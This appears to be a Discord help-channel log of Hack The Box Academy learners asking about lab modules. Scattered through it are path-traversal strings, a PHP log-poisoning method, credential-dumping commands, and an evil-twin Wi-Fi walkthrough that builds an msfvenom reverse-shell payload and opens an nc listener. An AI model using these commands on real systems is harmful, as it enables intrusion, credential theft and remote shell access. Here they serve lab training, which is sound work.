Hello guys, I'm new here and I'm stuck to the Skill Assessment in File Inclusion Module.
I can read the /etc/passwd file and look for Log Poisoning.
I have the following path GET //api/example.php?p=....//....//....//....//example//example//example//access.log
I injected the PHP Payload with the user agent and can see the payload in the log. When adding the '&cmd=id' to //access.log request, nothing happens. Why? What am I doing wrong?

thin flicker
fathom pendant
earnest pasture
steel canyon
#

Is there any way to make the rdp session from the citrix breakout section in the winprivesc module be less painful? Opening a browser on that takes ages, I'd imagine the rest would be even worse

ocean night
# steel canyon Is there any way to make the rdp session from the citrix breakout section in the...

There is a little guidance on making RDP a little more efficient, but unfortunately, at least in my experience, Citrix IS pain.. Maybe the guidance here will speed up the RDP session a bit, some have found adjust the MTU to help with RDP issues, but that was more on actually connecting than performance IIRC. Only other suggestion I can give would be to ensure you are on the VPN location most appropriate, and lowest load showing on the VPN settings screen

If you want to check latency from your connection to the VPN edge server, you can check the ping to the host defined in your ovpn config file (e.g. edge-eu-academy-1.hackthebox.eu)

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_480d492483

https://academy.hackthebox.com/vpn

turbid hull
#

Hello there, i am actually doing the SQLMap fundamentals module and i have a question, does SQLMap works on https ?

#

I found people saying yes and people saying no...

ocean night
#

Yes

gloomy lichen
#

Anyone who's done the recent "WiFi tools and techniques" module could sanity check me quickly for SA Q5? I've done all the other ones, but I'm hitting a skill issue on this one it seems.

steel canyon
turbid hull
#

just found the answer reading the man ^^

crude wing
#

Does anyone manage to get the "XSS and CSRF Exploitations - XSS Filter Bypasses task" working? Facing werid cors error from browser, but it was working the whole module lol

#

so weird.

#

also, the module seems have been updated, no such things as exfiltrate.htb which was mentioned in the academy forums.

opal helm
#

Hey @all. i am facing an issue on Module "SQL Injection Fundamentals". In the Assessment part , i don't know why i get 400 bad Request (target given )

grand veldt
#

can somebody help me that how to connect vpn in htb lab or how to import dowmload file of vpn in htb .Is htb -lab and htb-machine have same pwnbox ??

ocean night
#

Labs (app.hackthebox) and Academy (academy.hackthebox) are different. This channel is for discussion of Academy modules.

#

The Pwnbox on whichever platform you are using it on will share the same VPN configuration, and you cannot connect to the VPN from multiple places at once

#

On app.hackthebox, there ARE different VPN configs per lab type, such as Pro Lab, Fortress, Machines, etc etc

grand veldt
#

bro i actually understand this (lab access). but when i treid to connnect it through vpn it didnt send any output and took long time and failed to connect . i aslo treid troubleshoot

ocean night
#

I'd suggest speaking in #1024429874246590575 and providing more information past "it took a long time and failed to connect", e.g. logs

#

..or raise a ticket with support

compact patrolBOT
heady sapphire
#

Document and reporting practise lab. I canโ€™t find the admin credentials to log in to the report writing web app on port 443 as mentioned in the course . The admin credentials are not provided . Please help !

heady sapphire
#

Hello guys ! I have a question ! Yesterday when I was doing a lab , I managed to find retrieve a domain userโ€™s credentials and I ran bloodhound-ce-python ingester to get bloodhound loot . However , when I imported the loot it uploaded and ingested all right but when I tried to ran some basics cypher queries such as find all domain admins I get no information . However when I try other manual tools on the compromised machine such as Get-DomainGroupMember -Identity "Domain Admins" -Recurse` , get all domain admins which confirms that exist but bloodhound does not show them . Any idea why this might be happening ?

heady sapphire
coarse pine
heady sapphire
fiery light
#

hello, i have a quick question about Interacting with Users page 25 in Windows Privilege Escalation module, the hint said that i should find a shared folder that my user are writeable, however, i check smb share and i can't write to this share folder. Please help!

earnest jacinth
#

try to verify if you can upload files to the directories in the share

#

dunno if there is a method to automate that in nxc

#

nxc is crackmapexec btw *

#

just newer version

fiery light
feral adder
#

Guys how do I install gopherus in python3?

earnest jacinth
#

I think you should check the permissions on the subfolders too

earnest jacinth
#

You can also use the --put-file option in automation with nxc to upload a file to each directory, and validate whether you have write access based on the tool's output

#

if you don't feel like reviewing the ACLs

fiery light
#

oh nice command, can you give me the automation command that will upload the file to each directory? this one kind of new for me. normally i just review ACLs. and thank to you, i know i missed critical information

earnest jacinth
#

use nxc smb -h for more details

fiery light
#

oh thank you

coarse pine
#

Hello guys, can someone help me in File Inclusion module?
in section basic bypass

I when I add . to the URL it says Illegal path specified!

I tried to encode that and it didn't work

also when I try to use this url

it still say the same thing.. when I try this also
languages/../../../../etc/passwd
this time it shows nothing.
some clue?

coarse pine
#

languages/../../../../../../../../../../etc/passwd

#

like this?waz

#

shows nothing

#

hmmmHug hhmmmmmmmmmmm

#

../../../../../../etc/passwd
also this didn't work even when I encode it

#

God please help

hidden ledge
#

Did you actually try the teached bypass methods ?

#

Because the solution is taught in the section

coarse pine
#

I tried three of them
Non-Recursive Path Traversal Filters
Encoding
Approved Paths

I tried to do something like ..//..//
also tried to aways put the languges directory in the path and encode it

#

||if(preg_match('/^./languages/.+$/', $_GET['language'])) {
include($_GET['language']);
} else {
echo 'Illegal path specified!';
}||

but when I try to visit

./languages/../../../../../etc/passwd

it does not like the ./ in the beginning. but even when I encode it doesn't work

young sentinel
#

I am stuck with something in the Using Web Proxies/Repeating Requests. I had to look into the solutions, cause I could not find anything pointing me to figuring out how to find the root where the flag is and i definitely could not get my burp suite to read it. The last time I read the flag, it was in the repeater tab (purely by accident) and I actually (also purely by accident) linked the ls and cat commands together and i got the answer. Why can't I get the repeater to read the .txt??

heady sapphire
#

This. Command : pypykatz lsa minidump /home/peter/Documents/lsass.dmp and this command: netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa do the same thing ? Or they are two separate things ?

brave field
heady sapphire
dense lava
heady sapphire
dense lava
dense lava
heady sapphire
#

Ok thank you

dense lava
#

Sometimes some overlap but they are not the same

digital crater
#

Skill Assessment - Parameter Logic Bugs (CWEE course) - Has anyone had trouble running the docker for the assessment as provided?

I had to add the following line to the Dockerfile

RUN apt-get update && apt-get install -y libatomic1

Now the image gets created but it won't run.

gray swift
#

Can someone help me or give me a hint in SQLi fundemintals-Skill Assessment? "chattr website"

gray swift
#

what mean dm?

brave field
gloomy lichen
#

Hello, mind if I DM about this? I also might be able to help if you still need it.

median gale
fresh moth
#

is Attacking Common Services - Attacking FTP they are asking the ftp port number i tried various scans enumerated smb and foubd an id-rsa (which has no permission ) im s stuck

ocean night
#

The writeups must be wrong then..

#

Writeups for Tier 2 also, oh dear

#

Regardless of whether you're running off of writeups, did you actually repeat the exercise yourself instead of just pasting the answer @proven spear ?

proven spear
#

yup

#

i visited archive sites it redirect me to a .org site

fresh moth
ocean night
#

I don't know what to say, many others go tthe correct answer, perhaps go through the task once more to be sure you've not made a mistake somewhere

proven spear
#

ok ill try thank you !

ocean night
fresh moth
#

yeah becasue normally if the port aint 21 in ctfs it might be 2121 juast like http 8080 a guess

ocean night
#

Fair enough

#

But yeah, check your VPN

#

The target definitely works

soft stratus
fresh moth
#

reseting the vpn rn

ocean night
#

That includes Tier 0 (free) modules

#

If you unlock a module with Cubes, it is open to you to spawn AFAIK

#

Same as if you had completed it under a subscription

#

I think

agile meadow
#

Hey guys!

I'm new to windows/ad and now while I was going through the Active Directory Enumeration & Attacks - Access Control List (ACL) Abuse Primer, two seemingly contradictory sentence got my attention: "Every object has an ACL, but ..." and "If a DACL does not exist for an object, all who attempt to access the object are granted full rights."
So that means it is possible that an object has only a SACL, so the access is logged but all access is allowed since there's no DACL?

ocean night
#

It's working fine @soft stratus - pay attention to the section content

soft stratus
#

finally found it lmao i was so stupid

#

just needed to visit /swagger/index.html

proven spear
ocean night
#

Be wary of what you post @soft stratus, that is a Tier 2 module after all

dull solar
#

Q: What's the difference between ||sudo tcpdump -rX /tmp/capture.pcap|| which is in the order of the question's phrasing, and was wrong, and ||sudo tcpdump -Xr /tmp/capture.pcap|| which was correct?

||Question's phrasing: "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)"
[Read comes first, then showing in HEX & ASCII comes later].

||
And to provide some context the previous question said ||"please answer in the order the switches are asked for in the question."||

gray swift
#

You can use -h and check

fiery light
#

hello, i need help with session Pillaging for module Windows Privilege Escalation question 5: Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.
i tried to backup for SAM and SYSTEM file but get access denied.

teal root
#

Can anyone give me a nudge on the Active Directory Trust Attacks - Skills Assessment, last question for compromising fabricorp.ad, I cant find a way to elevate from MSSP. The fabricorp DC is not responding on ldap from MSSP DC

gray yacht
teal root
#

Ive reset the lap in case it was buggy, but same issue with fabricorp LDAP not responding

prime wasp
#

If the PWNBOX doesnโ€™t work for non-paid users. If I buy some cubes does that make me a paid member?

#

Or do I have to subscribe to annual billing?

#

And choose a path

#

Or silver membership?

blazing cloak
#

hey guys, is any1 facing issues with spawning targets?

prime wasp
fathom pendant
#

fairly certain considering that's how my account has been for a while

south hound
#

Did you checked any backups already saved in repository?

fiery light
#

oh, i already solved it ๐Ÿ˜„ haha thank you btw

marble quiver
#

Are the images in the Academy also not loading anymore for someone else?

signal chasm
#

I am doing the modul User Management from the Linux fundamentals. I am stuck at 2 questions... i tried already with my personal brute force algorithm (my handy and the web) every thing but i cannot find the answer for 2 questions. I am sure this is a a thing where I wrote a letter in capital which i shouldnt, or other way around. therefore i wanted to ask if anyone could help with these 2 questions:

  1. Which option needs to be set to lock a user account using the "usermod" command? (long version of the option) ==> My Answer is "-L"
  2. Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option) 00> My Answer is "-c"
    none of the work. I tried with sudo usermod, just usermod etc... keep getting errors. can someone help?
brave field
tight seal
#

Having problems in pass the hash question + 0 Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

#

Not able to find any david.txt inside the share

gray yacht
# tight seal Not able to find any david.txt inside the share

If you did this correctly and can access the share, but there is no flag inside the share, you likely need to reset the lab. You can DM what steps you took and your command with the empty share if you'd like me to confirm it before you reset.

tight seal
#

What if I evil winrm david ?

#

Directly*

gray yacht
tight seal
#

Okay thanks I'll try once again

reef harness
#

hello guys... I'm having some problems and dont know the right channel to ask for help...I was doing a module and solving the exercises via VPN. Everything worked fine... now when I got to the final exercise vpn connects, i can ping the box but I cant access the box on the browser, I cant curl the box... I cant do anything but ping... but inside the vm on the website it works fine... already change the vpn node, rebooted my system and nothing...can you guys point me to the proper place to get help?

spiral moss
#

hi, i'm working on module/226/section/2451 Suricata Rule Development Part 2 (Encrypted Traffic).

i can't reach via ssh the target. i'm connected to the academy vpn

rocky vigil
#

hello guys I'm jus wondering if I'm stuck in a skill assessment should I ask for hints or no ?

cloud urchin
#

i'd say depends on how long you worked on it. sometimes it takes days. i'd recommend going over the content again in the modules, sometimes there are key things in one little line you can miss. i would only come ask for help after i've been stuck for a long time, but that's just me and how i operate.

cloud jasper
#

hi, i just started the academy and i'm trying to use WSL2 on the premade Windows Developer VM that you get from the Setting Up/windows module, i've already followed the steps until "Windows Subsystem for Linux 2", but i'm having issues when it ask me to type "bash" in the PowerShell i've been trying for 4 hours with no results

fiery light
#

hello, can anyone check the Windows Privilege Escalation Skills Assessment - Part I machine, i cannot ping to the machine, i tried to reset several times. i can access to normal machine. Please help!!!!!

cyan veldt
#

DM me

coarse pine
#

Hello.. I need help with LFI module..

cyan veldt
coarse pine
#

but actually the the response will be always when you fuzz for params so ffuf can not know the different

#

so I used a tool calles fallparams and got 2 params.. then used a huge wordlist for LFI even bigger than they said I should use and found nothing

fathom pendant
coarse pine
#

but when I do that basically I get nothing

fathom pendant
coarse pine
#

and that is normal because even if the param is used it may not cahnge the length of the page

fathom pendant
#

Because it'll provide a different response

fiery light
fathom pendant
#

If that still doesnt fix, change vpn regions, close the vpn connection, spawn a new target

#

If that doesnt work, reach out to website support

coarse pine
#

same length

fiery light
fathom pendant
coarse pine
#

thaattt imparaassinnggg dont tell meeee

#

I mean it is fallparams creator problem not me

#

right?

#

๐Ÿฅบ .

fathom pendant
#

It could be both

coarse pine
#

but I already used big.txt with ffuf and filtered that size.. get nothing..

fathom pendant
coarse pine
#

ok let me see

fathom pendant
coarse pine
#

I mean with this I can not show for months

cyan veldt
fathom pendant
fathom pendant
coarse pine
#

I downlaod it from github

fathom pendant
#

you had the right filter size for ffuf

coarse pine
#

I did not even filter nothing shows

fathom pendant
#

then something you're doing is wrong

coarse pine
#

please don't tell me I am stupid

fathom pendant
#

or the target died

#

because if you look

#

errors:2588

coarse pine
#

oh

#

how did he die

#

it jsut 30 mins

fathom pendant
#

time, it hated itself, it hates you

coarse pine
fathom pendant
#

many such cases

amber rose
#

cannot connect to RDP session it just fails or entirely laggy im using it on pwnbox tried all different regions

#

no avail

amber rose
#

bruh cool support thanks for the help

fathom pendant
floral talon
#

im on the Pentest in a Nutshell module and the Windows System enumeration part

the question is What is the exact OS Version that WinPEAS delivers?, but winpeas output did not return system information because it didnt have enough permission to run the .exe
i did run get-computerinfo
OsVersion : 10.0.17763
the checker says its wrong

#

i did also run a powershell script to get the full version which was 10.0.17763.2628, but that is still not the answer the checker expects

fathom pendant
floral talon
reef harness
astral veldt
#

Hello everyone, I need a help on JS Deobfuscation module, section 6. I find the right flag, but it is not acceptable. I don't know what I missing.

fathom pendant
#

i'm not pasting the full flag per ToS
HTB{1_..r!}

astral veldt
fathom pendant
fathom pendant
astral veldt
ornate wind
#

Can someone help me with a module? I cannot get it working

gritty light
#

Wi-Fi Evil Twin Attacks - Skills Assessment > Q2.) Compromise a client device on the "PulseGrid"

I'm getting the HTTP requests, but no connection from client

wifi@Attica:~$ sudo systemctl restart NetworkManager
sudo airmon-ng start wlan0

Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    180 avahi-daemon
    195 wpa_supplicant
    199 avahi-daemon
    701 NetworkManager

PHY    Interface    Driver        Chipset

phy1    wlan0        mac80211_hwsim    HTB Chipset of 802.11 radio(s) for mac80211
        (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
        (mac80211 station mode vif disabled for [phy1]wlan0)
phy2    wlan1        mac80211_hwsim    HTB Chipset of 802.11 radio(s) for mac80211
phy6    wlan2        mac80211_hwsim    HTB Chipset of 802.11 radio(s) for mac80211

wifi@Attica:~$ sudo airodump-ng wlan0mon -w HTB -c 1
19:58:32  Created capture file "HTB-01.cap".

<SNIP>                        
 52:DC:8C:79:EB:87  06:03:41:2B:28:E0  -29    1 - 9      0       15  PMKID  PulseGrid                
<SNIP>
#
wifi@Attica:~$ cat hostapd.conf 
ssid=PulseGrid
interface=wlan1
channel=1
hw_mode=g
# Mana Attack Configuration
enable_mana=1
mana_loud=1
# WPA AP Configuration
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=PSKmismatchmaker
wifi@Attica:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
nc -lvnp 4444
Would you like to use and setup a new database (recommended)? yes
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

Listening on 0.0.0.0 4444

wifi@Attica:~$ sudo ifconfig wlan1 down
wifi@Attica:~$ sudo macchanger -m 52:DC:8C:79:EB:87 wlan1
Current MAC:   8a:0f:7a:a8:09:bd (unknown)
Permanent MAC: 02:00:00:00:02:00 (unknown)
New MAC:       52:dc:8c:79:eb:87 (unknown)
wifi@Attica:~$ sudo ifconfig wlan1 up
wifi@Attica:~$ sudo hostapd-mana hostapd.conf
Configuration file: hostapd.conf
Using interface wlan1 with hwaddr 52:dc:8c:79:eb:87 and ssid "PulseGrid"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED 
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
Unsupported authentication algorithm (3)
handle_auth_cb: STA 06:03:41:2b:28:e0 not found
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0

ornate wind
marsh vessel
#

there is a thing i don't understand in the file inclusion module in the section of the log poisoning
why after i add in the log file the php script to get the shell and then run a command using this shell
like index.php?language=/var/lib/php/sessions/sess_asttmm182ahi117n0eqnv5lfpu&id=ls / if i ran another command it don't work until i send another request with the php rce ?

fathom pendant
fathom pendant
ornate wind
fathom pendant
ornate wind
# fathom pendant Im not familiar enough with lxc/lxd to be of any help

It is more about networking, I guess.
I have no problem creating those containers. That works just fine. Problem is that I don't have access to the internet.
On my VM it works without a problem, but on the laptop I am really struggling to understand the process of bridging or forwarding the connections?

#

I know it is not essential to have those containers, but I see it as an opportunity to learn and get a better understanding of networking.

fathom pendant
coarse pine
#

the final boss

ornate wind
#

Alright, I have spent a lot of time on this but I have no idea if I am even on the right track.

coarse pine
#

and I will never use fallparams again

glossy timber
#

Hey ppl I could use some help with the network foundations module - components of a network it doesnt take my answer in the first question what cable is used to transmit data over a long distance with minimal signal loss .. Its clearly fibre-optic IMHO but it tells me its wrong ?

fathom pendant
blissful agate
#

In WI-FI Evil Twin Attacks, for anyone with the fluxion error message: "aborted, xterm session failed", typing this commandxhost +SI:localuser:root fixed it for me.

coarse pine
#

sooo....

#

maybe I should wait for 1-2 days

#

oh

#

it wass simple

glossy timber
#

Next question relared to the network foundations DNS : i think Theres a logical error since the first thing a PC checks in the DNS Resolution Process is not the local DNS Cache but the Hosts file since the hosts file overrides any entries made in the cache - or am i wrong ? ๐Ÿ˜…

coarse pine
#

@fathom pendant hey can I ask you about something please

tall sapphire
#

i nrrf help about that + 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

ocean night
#

For fucks sake

#

<@&861185840277487616>

tall sapphire
#

?

coarse pine
ocean night
#

You didn't even read what I said

tall sapphire
#

sry

#

now ok?

ocean night
#

Yes, you can't just post module information like that above Tier 0, please read the above link and the channel topic

#

Someone may or may not be able to hop in to chat with you

tall sapphire
#

ok can you help me?

#

like a tip ?

ocean night
#

I literally just said that I'm unable to help with content

tall sapphire
#

sry im working for 12 hours constant and now that....

coarse pine
tall sapphire
#

yes

ocean night
tall sapphire
#

the wordpress one

coarse pine
ocean night
#

Thank you aw0ken

tall sapphire
#

yes but my issue is to find the vuln in the ouput, but im not allowed to post it here

velvet pawn
#

Hi, I am doing the "Online PIN Brute-Forcing Using Reaver" however reaver continuously gets "EAPOL START request" when trying to bruteforce the pin. Even after extendint the wait time. Here is my command:

'''
sudo reaver -i wlan0mon -vv -b 4A:60:21:C3:7E:8D -c 1
'''

#

Anything I am missing here?

cloud urchin
#

You'll get a better response if you state the module/section/question you're on

velvet pawn
#

Wifi Pentesting - Online PIN Brute-Forcing Using Reaver

#

from what I have found online seems other have had the same issue, not knowing if its expected to take over an hour, or if reverting the machine is required, but from what I see, it just constantly times out after sending the EAPOL request

cloud urchin
#

I don't think that's a module

velvet pawn
#

my bad: Attacking Wi-Fi Protected Setup (WPS)
Online PIN Brute-Forcing Using Reaver

vast cairn
#

Hey all, I'm wracking my brain on what I'm doing wrong with the DnsAdmins module. I've reset the target probably 4 times now, I've rebuilt the adduser.dll numerous times, but nothing seems to make my process's results match the workflow. I try loading the DLL as a non-privileged user, and it passes, it doesn't fail. I then try loading the DLL as member DnsAdmins, it does say that I am memeber of DnsAdmins after all. This passes. I try to then get my SID for "netadm" and it says it's an invalid query. I can't get past this, because even though sc command says I have RPWP, when I stop/start the dns service it doesn't change anything. and When I confirm the group memebership for "Domain Admins" it doesn't list me as a member of domain admins. I've even tried using the adduser.dll from C:\Tools, and that doesn't change anything either.

cloud urchin
#

@fiery light Please do not reveal attack paths for skill assessments

crisp cove
#

Hi everyone, can someone help me with this question under Javascript deobfuscation module?

I have got a flag but that is not being accepted as an answer.

cloud urchin
#

Best to say which section too

crisp cove
#

deobfuscation section

cloud urchin
crisp cove
#

yes I am using the whole HTB{} format

cloud urchin
#

You can DM me the flag you have

ivory hill
fathom pendant
#

they get it deobbed then work ahead with the deobbed code

fiery cosmos
#

Module Information gathering - web edition section web archives. When i go to the hackthebox website on the wayback machine on these two dates, i get this page and I canโ€™t find the answers. The problem is with these two questions only.

#

Sorry for the atrocious quality

waxen totem
fiery cosmos
#

Thank you

half geyser
#

Are there any plans to improve performance of any of the modules that use RDP?

halcyon flume
#

Module Android Application Dynamic Analysis Section Exploiting WebViews. I have the flag but I can only visually see it and can't copy and paste. There's a mix of letter 'I' and 'l' which makes it confusing. I submitted a few times but the flag is wrong. Anyone can help?

calm abyss
#

i am stuck at the same thing, did you slove the module ?

halcyon flume
#

Module "Android Application Dynamic Analysis" Section "Insecure Library Load Through Deep Linking" - I am following the module but my app doesn't update to v2.0 when I click the Update link. I think it's causing problems for the module assessment. Anyone can help?

fervent ether
#

Windows Process Injection: Can get the Process Injetion Payload to run fine on DEV but not on the Target Machine. Have also double checked and ran the Solution which also still doesnt work.

I have been making a C# Console App as RELEASE/x64 like some other advice people have been given but its still not working :/

Anyone got a workaround?

grand veldt
#

can somebody tell me that acessing to linux fundamentals and its modules there are some modules which have some explaination but when you see the queitons that are present below the module . these questions are very different from those command that i just learnt . for example i learned cat /etc/passwd command and the question they asked about ports why ??

gray yacht
fervent ether
grand veldt
#

nope some moudules of linux are not connected to the quesitons that asked ๐Ÿ˜ซ

digital pendant
brazen saffron
#

To complete Footprinting lab, I used xfreerdp3, but I would like to know how may I specify the "type" / language of the keyboard? Is there an option for this? Thank you :).

digital pendant
#

keyboard settings, for example US to UK, I change the keyboard layout to UK and delete the US one. Then connecting to xfreerdp it uses UK then

brazen saffron
#

I don't want to edit my own system...

#

I would like to know if there is an arg in the command.

digital pendant
#

Understood, when you find out let me know... maybe try the man page.

brave field
digital pendant
brazen saffron
fathom pendant
brave field
brazen saffron
#

Alright thanks!

fathom pendant
brave field
remote lion
#

can I install android studio and use its emulator on Kali virtual machine ?

fathom pendant
#

yeah probably

calm abyss
#

anybody did Wi-Fi Evil Twin Attacks - Skills Assessment ?
I am stuck at 1st and 2nd question

sudden locust
#

I started a module call network foundations and I reached Skills Assessment Ch 3, I followed the instruction entered passive mode (10,129,166,17,194,11) and calculate the real FTP port (P1 * 256 + P2 = 194*256 + 11 = 49675), afterthat I typed nc -v 10.129.166.17 49675 which return connection refused. What did I do worng? How should I fix it. Thanks.

fathom pendant
#

try with -nv not just -v

blissful agate
#

For future students. In Wi-Fi Evil Twin Attacks, the WifiPhisher plugin update attack walkthrough didn't work for me on the "twins" RDP box. I think the MSFVenom payload generator on the box might be bugged. I was able to transfer a working MSFVenom shell.elf payload from my own Kali instance to the "twins" box and get the shell to connect from the victim.

sudden locust
rustic sage
#

WEP attacks - korek chop chop attack. Has anyone completed this? Something in this module isnโ€™t explained well and Iโ€™m missing something. The attack doesnโ€™t seem to work.

rocky vigil
remote lion
quaint geode
#

Hey all, Iโ€™m working on the SA2 exercise (VBScript โ†’ payload execution โ†’ AMSI/CLM context) for the Introduction to Windows Evasion Techniques module.

I have a VBScript in C:\Alpha\SA2 that runs an EXE from C:\Windows\Tasks.
When I run the chain manually as my assigned user, the EXE runs fine, AMSI gets patched, and the payload executes.

However, when the victim user runs the exact same VBS (via the provided harness command), the behaviour is very different:

The VBS definitely runs (confirmed in the harness logs).

  • Defender does not block the script.
  • The EXE is never executed:
  • no debug file from the EXE,
  • no network activity,
  • no errors from VBScript,
  • harness times out after ~45 seconds.

AppLocker shows that binaries in C:\Windows\Tasks should be allowed for the victim user, so on paper it should run.

Because the EXE never executed, the only way I could solve the exercise was to avoid PowerShell entirely and use pure VBScript to read the flag directly from the victim userโ€™s Desktop.

My question is : Is this the intended path for SA2, or is the goal to actually get a reverse shell (or PowerShell execution) as the victim user? If a revshell is expected, I canโ€™t figure out how to get past whatever is preventing the EXE from executing.

Any hints or clarification would be appreciated!

rocky vigil
# remote lion I've spent hours to try it , it didn't work , I will try your idea

if you can't connect to adb from your vm open a ssh server from your windows machine Start-Service sshd and try to connect to the spesific port of adb in your vm for example here the adb is running on port 5555 on my windows machine ,on kali : ssh -L 5555:127.0.0.1:5555 username@<my-windows-ip> then adb -s 127.0.0.1:5555 shell you will get the shell of your android device

rocky vigil
#

any hints for : module 171 section 1692 stuck on it for days

pale island
#

anyone able to give me a nudge on the XSS skill assessment ( can't seem to find the vulnerable field)? (got help already)

calm abyss
chilly furnace
#

Hey all, Iโ€™ve made it to the dreaded thick client apps module of CPTS. I am stuck. I have the module step by step to create the .bat file from restart-oracleservice by modifying the Temp folder permission for cybervaca. Tried this multiple times and the .bat file isnโ€™t created in the Temp\2\ directory. Procmon shows a bat file is made in some \Temp6BAC.tmp \ directory, but it isnโ€™t accessible when I try to navigate to it

long kelp
#

Hi there. I've only recently started with htb and currently working myself through the 'Getting Started' module. Currently doing the nmap exercise:

Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

I'm running an nmap using the following command:
nmap -sV -sC -p- <target ip>

The first 40% or so of the portscan progresses quickly, but then slows down to a crawl to an extend the target will run out of life before it completes. Is this expected behavior? How do I avoid getting throttled? Using a pwnbox.

**Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 41.51% done; ETC: 11:33 (0:01:18 remaining) Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 41.58% done; ETC: 11:33 (0:01:23 remaining) Stats: 0:02:42 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 42.05% done; ETC: 11:37 (0:03:43 remaining) Stats: 0:30:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 44.36% done; ETC: 12:39 (0:38:02 remaining)**

digital crown
#

hope i wont get flagged for spam... but anyways

#

do you guys recommend any htb module for a job interview for handling incidents like spam/phishing/etc?

exotic dagger
brazen marlin
#

how is hashcat module tier 2 but password attacks tier 1? i find the second one significantly harder

tranquil axle
#

I had to switch the VPN, in aireplay-ng you need to select a packet from the client to the AP that is not too small. On one of my instances I would just not get such a packet, it would only give me <40 byte packets or not originating from client/to ap. Once I switched the vpn region it worked immediately

tranquil axle
leaden island
#

Yo guys im stuck on IDOR mass enumeration in web attacks, the browser says waiting for weloveiconfonts.com, the browser times out when trying to manually reach this domain

#

Is there a way to skip reaching that domain within the browser ?

#

cURL works fine for the target website

lyric radish
#

If you really don't need it

leaden island
#

nice trick

#

Not working though Kappa

storm elk
#

Browsers cache dns too

#

Use a different browser or private browsing mode

leaden island
#

Thanks yall

storm elk
leaden island
#

im still on the same section ๐Ÿฅ€
im supposed to perform IDOR on the uid parameter of documents.php, and get all the document of the first 20 users
however, doing so im not getting any files

#

dunno if sharing the command is a spoiler

spiral yarrow
#

for the HackTheBox Attacking Wi-Fi Protected Setup (WPS) in the tasks it's very laggy and it takes a lot of time to get the PSK is this a global problem of from my side only (Please note that I'm using PwnBox not VPN)

coarse pine
fathom pendant
fathom pendant
coarse pine
#

aaa

#

guys in the hacking wordpress module wapplayzer and even wpscan say that the website does not use wordpress

#

in the skill assessment

fathom pendant
coarse pine
fathom pendant
brazen marlin
# coarse pine they did not teach you how to do that in the module btw

one thing about learning- you are expected to do some outside research, find other ways. when you get to more advanced modules tier2 and above it's very useful to read the readme for the tools you use, and experiment with them and how they work. not just using a tool but understanding a tool is very beneficial

#

when you know how something works, you can troubleshoot it and understand why it's not working

tall sapphire
#

hi guys i have a issue with finding flag.txt on the system im already in the system (msf payload) . In the question task its talks about a Admin file with flag.txt i was in /root and in the entire system but no trace ? Dm me for more spec infos. thanks

brazen marlin
coarse pine
#

am cooked

hidden ledge
#

It will hopefully be on the top of rockyou.txt lmao

#

Not usual to run rockyou on wordpress in general

coarse pine
hidden ledge
#

Yes even in the module they do it so it's ok I guess if you have time

coarse pine
#

I started it when I got usernames then do other things

#

btw

#

you should get a password for one of the users with that

#

but not the admin

#

๐Ÿฅบ ...

hidden ledge
#

For which user are you looking for the password ?

#

You will never have to wait for 1 hour of bruteforcing

coarse pine
#

I just have to bruteforce for other user for 3 minutes maybe

#

but I just keep trying on admin. I forget that running

hidden ledge
#

Oh ok misunderstanding :))

coarse pine
#

yes!!

#

finally

#

dudeee that was ffufuufuunnn!!!!!!!!!!!!!!!!!!!!!!!!!!!!

hidden ledge
coarse pine
#

aaaaaa

cloud urchin
#

well, 5 of them being given away

uneven quiver
#

Hey all, can anyone help me understand this, So, Im doing a exercise (nmap module), get dns version, the HTB answer nmap -Pn --disable-arp-ping -p53 -sU -sC 10.129.2.48 -v --packet-traceโ€ฆ.gets the result but if you try any other way like this one nmap -Pn --disable-arp-ping -sU -sC -p53 10.129.2.80 --packet-trace, you donโ€™t get the result the other one always gets open|filtered with no results. Please, anyone help me understand this

uneven quiver
#

omg, thank you sir

#

Ive been scratching at it long

brittle arch
#

Has anybody seen this error:
[ERROR][com.freerdp.core.transport] BIO_read retries exceeded when trying to RDP through the VPN and Ligolo? Fairly sure it is not a credential problem (nxc says +) but I've never seen it before and can't get RDP connection

chilly furnace
#

I apologize for the duplicate post, but I canโ€™t get this issue to resolve.

Iโ€™ve made it to the dreaded thick client apps module. I am stuck.

I have followed the module step by step to create the .bat file using the restart-oracleservice executable and modified the Temp folder permission for the user cybervaca.

